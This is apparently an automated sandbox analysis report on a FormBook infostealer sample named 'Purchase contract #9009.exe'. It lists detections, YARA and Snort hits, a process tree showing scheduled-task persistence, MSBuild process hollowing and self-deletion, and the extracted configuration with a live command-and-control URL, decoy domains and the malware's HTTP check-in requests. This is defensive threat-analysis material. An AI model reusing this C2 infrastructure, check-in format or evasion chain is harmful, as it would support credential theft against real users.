Loading ...

Play interactive tourEdit tour

Windows Analysis Report Purchase contract #9009.exe

Overview

General Information

Sample Name:Purchase contract #9009.exe
Analysis ID:458959
MD5:acff75235867dd82b2679b4afd3ad525
SHA1:072839587fc2c193afd5963c467502be89815c2a
SHA256:84f6beeecfc24544df0a59c7b7f0961c44d835f95f23289dac5730decc2d4957
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Purchase contract #9009.exe (PID: 6948 cmdline: 'C:\Users\user\Desktop\Purchase contract #9009.exe' MD5: ACFF75235867DD82B2679B4AFD3AD525)
    • schtasks.exe (PID: 7128 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MSBuild.exe (PID: 3844 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 1572 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 4112 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.narrowpathwc.com/n8ba/"], "decoy": ["thefitflect.com", "anytourist.com", "blggz.xyz", "ascope.club", "obyeboss.com", "braun-mathematik.online", "mtsnurulislamsby.com", "jwpropertiestn.com", "animalds.com", "cunerier.com", "sillysocklife.com", "shopliyonamaaghin.net", "theredcymbalsco.com", "lostbikeproject.com", "ryggoqlmga.club", "realestatetriggers.com", "luvlauricephotography.com", "cheesehome.cloud", "5fashionfix.net", "wata-6-rwem.net", "ominvestment.net", "rrinuwsq643do2.xyz", "teamtacozzzz.com", "newjerseyreosales.com", "theresahovo.com", "wowmovies.today", "77k6tgikpbs39.net", "americagoldenwheels.com", "digitaladbasket.com", "gcagame.com", "arielatkins.net", "2020coaches.com", "effthisshit.com", "nycabl.com", "fbvanminh.com", "lovebirdsgifts.com", "anxietyxpill.com", "recaptcha-lnc.com", "aprendelspr.com", "expatinsur.com", "backtothesimplethings.com", "pcf-it.services", "wintonplaceoh.com", "designermotherhood.com", "naamt.com", "lifestylebykendra.com", "thehighstatusemporium.com", "oneninelacrosse.com", "mariasmoworldwide.com", "kitesurf-piraten.net", "atelierbond.com", "mynjelderlaw.com", "moucopia.com", "hauhome.club", "imroundtable.com", "thralink.com", "baoequities.com", "nassy.cloud", "goldenstatelabradoodles.com", "revenueremedyintensive.com", "dfendglobal.com", "pugliaandgastronomy.com", "cypios.net", "trinioware.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 15 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.MSBuild.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.MSBuild.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.MSBuild.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        4.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.MSBuild.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentCommandLine: 'C:\Users\user\Desktop\Purchase contract #9009.exe' , ParentImage: C:\Users\user\Desktop\Purchase contract #9009.exe, ParentProcessId: 6948, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 3844

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.narrowpathwc.com/n8ba/"], "decoy": ["thefitflect.com", "anytourist.com", "blggz.xyz", "ascope.club", "obyeboss.com", "braun-mathematik.online", "mtsnurulislamsby.com", "jwpropertiestn.com", "animalds.com", "cunerier.com", "sillysocklife.com", "shopliyonamaaghin.net", "theredcymbalsco.com", "lostbikeproject.com", "ryggoqlmga.club", "realestatetriggers.com", "luvlauricephotography.com", "cheesehome.cloud", "5fashionfix.net", "wata-6-rwem.net", "ominvestment.net", "rrinuwsq643do2.xyz", "teamtacozzzz.com", "newjerseyreosales.com", "theresahovo.com", "wowmovies.today", "77k6tgikpbs39.net", "americagoldenwheels.com", "digitaladbasket.com", "gcagame.com", "arielatkins.net", "2020coaches.com", "effthisshit.com", "nycabl.com", "fbvanminh.com", "lovebirdsgifts.com", "anxietyxpill.com", "recaptcha-lnc.com", "aprendelspr.com", "expatinsur.com", "backtothesimplethings.com", "pcf-it.services", "wintonplaceoh.com", "designermotherhood.com", "naamt.com", "lifestylebykendra.com", "thehighstatusemporium.com", "oneninelacrosse.com", "mariasmoworldwide.com", "kitesurf-piraten.net", "atelierbond.com", "mynjelderlaw.com", "moucopia.com", "hauhome.club", "imroundtable.com", "thralink.com", "baoequities.com", "nassy.cloud", "goldenstatelabradoodles.com", "revenueremedyintensive.com", "dfendglobal.com", "pugliaandgastronomy.com", "cypios.net", "trinioware.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exeReversingLabs: Detection: 36%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Purchase contract #9009.exeVirustotal: Detection: 25%Perma Link
          Source: Purchase contract #9009.exeReversingLabs: Detection: 36%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: Purchase contract #9009.exeJoe Sandbox ML: detected
          Source: 4.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Purchase contract #9009.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Purchase contract #9009.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000004.00000002.717581490.000000000169F000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.905256355.0000000004BEF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MSBuild.exe, explorer.exe
          Source: Binary string: explorer.pdb source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop esi4_2_00415806
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop esi9_2_02EB5806

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.narrowpathwc.com/n8ba/
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.narrowpathwc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.braun-mathematik.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=fB7/mPW92pywn6Xwyqh18GEo+pmrDDvkC2n8/jDO98DpKsBXISRlqcqxysno3HWOzWNm&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.lifestylebykendra.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.teamtacozzzz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=u7WOyhgrWbXbYgRGE85LieZphkZvcqsYIxt4hYVfzjTWHfz/MeXFN6mo9gA2dLoLONcI&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.ascope.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=6Zij7uW2iyXo7QMuDf/VYdYdyy83rT/k8hgIaZr1o/2iUx0BtZlp/rHpkQfYtJhmSC7t&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.5fashionfix.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu9lbAS6Kry+&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.mtsnurulislamsby.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=AVTd1ZN6JRCl2+QDYW+9mBRbWrEnsObc4Gp+SjPu6IU64q2qqDnQOXVzARk/xsnwgByw&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.wintonplaceoh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=xPi5BDAvQynHSVlVR/YHv5A7cLya1z2oKdj6PcHoa0/Qm6A62p0xrLdBVFxzQSXilAdH&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.backtothesimplethings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 95.215.210.10 95.215.210.10
          Source: Joe Sandbox ViewIP Address: 209.99.40.222 209.99.40.222
          Source: Joe Sandbox ViewASN Name: NEWIT-ASRU NEWIT-ASRU
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: Joe Sandbox ViewASN Name: WEEBLYUS WEEBLYUS
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.narrowpathwc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.braun-mathematik.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=fB7/mPW92pywn6Xwyqh18GEo+pmrDDvkC2n8/jDO98DpKsBXISRlqcqxysno3HWOzWNm&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.lifestylebykendra.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.teamtacozzzz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=u7WOyhgrWbXbYgRGE85LieZphkZvcqsYIxt4hYVfzjTWHfz/MeXFN6mo9gA2dLoLONcI&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.ascope.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=6Zij7uW2iyXo7QMuDf/VYdYdyy83rT/k8hgIaZr1o/2iUx0BtZlp/rHpkQfYtJhmSC7t&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.5fashionfix.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu9lbAS6Kry+&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.mtsnurulislamsby.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=AVTd1ZN6JRCl2+QDYW+9mBRbWrEnsObc4Gp+SjPu6IU64q2qqDnQOXVzARk/xsnwgByw&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.wintonplaceoh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=xPi5BDAvQynHSVlVR/YHv5A7cLya1z2oKdj6PcHoa0/Qm6A62p0xrLdBVFxzQSXilAdH&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.backtothesimplethings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.narrowpathwc.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Tue, 03 Aug 2021 20:58:18 GMTServer: ApacheX-Powered-By: PHP/7.4.21Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://braun-mathematik.de/wp-json/>; rel="https://api.w.org/"Data Raw: 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 09 3c 68 65 61 64 3e 0a 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 4e<!DOCTYPE html><html class="no-js" lang="de-DE"><head><meta charset="
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://domain.idwebhosting.net/linkhandler/servlet/RenewDomainServlet?validatenow=false&amp;orderid=
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
